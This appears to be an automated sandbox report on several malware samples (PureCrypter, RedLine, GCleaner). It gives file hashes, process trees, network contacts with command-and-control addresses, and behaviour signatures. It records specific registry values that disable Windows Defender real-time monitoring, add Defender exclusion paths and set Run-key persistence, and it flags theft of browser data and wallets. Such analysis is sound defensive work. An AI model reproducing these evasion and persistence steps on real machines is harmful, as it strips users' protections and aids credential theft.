| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
memory/1288-171-0x00000000065A0000-0x00000000065CE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll
| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll
| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
memory/2036-172-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\setup10298.exe
| MD5 | 369acf60d8b5ed6168c74955ee04654f |
| SHA1 | 1753fff63efa6ed5ad30ede6b959261ac67dd13e |
| SHA256 | 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632 |
| SHA512 | 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643 |
memory/856-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe.config
| MD5 | fd63ee3928edd99afc5bdf17e4f1e7b6 |
| SHA1 | 1b40433b064215ea6c001332c2ffa093b1177875 |
| SHA256 | 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9 |
| SHA512 | 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
Analysis: behavioral3
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win7-20220812-en
Max time kernel
145s
Max time network
143s
Command Line
Signatures
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | falcaoliderfm.com.br | udp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
Files
memory/1120-54-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
memory/1120-57-0x0000000000EE0000-0x0000000000EE8000-memory.dmp
memory/1120-58-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
memory/1120-59-0x0000000004855000-0x0000000004866000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:17
Platform
win10v2004-20221111-en
Max time kernel
159s
Max time network
214s
Command Line
Signatures
RedLine
Uses the VBS compiler for execution
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3596 set thread context of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3596 -ip 3596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308
Network
| Country | Destination | Domain | Proto |
| N/A | 72.21.91.29:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 51.11.192.48:443 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
| N/A | 82.115.223.46:57672 | tcp | |
| N/A | 82.115.223.46:57672 | tcp |
Files
memory/3048-132-0x0000000000000000-mapping.dmp
memory/3596-133-0x0000000000790000-0x0000000000817000-memory.dmp
memory/3048-134-0x0000000000400000-0x0000000000430000-memory.dmp
memory/4312-139-0x0000000000000000-mapping.dmp
memory/3048-140-0x0000000005B00000-0x0000000006118000-memory.dmp
memory/3048-141-0x0000000005670000-0x000000000577A000-memory.dmp
memory/3048-142-0x00000000055A0000-0x00000000055B2000-memory.dmp
memory/3048-143-0x0000000005600000-0x000000000563C000-memory.dmp
memory/3048-144-0x0000000001420000-0x0000000001486000-memory.dmp
memory/3048-145-0x0000000006600000-0x0000000006692000-memory.dmp
memory/3048-146-0x0000000006C50000-0x00000000071F4000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win7-20221111-en
Max time kernel
158s
Max time network
164s
Command Line
Signatures
GCleaner
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" | C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\is-A7MMA.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Reg Organizer\Languages\is-SVNUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-DV6H2.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-K3SKE.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-LKVCE.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-P4TTQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-4486U.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\cjNumber | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | N/A |
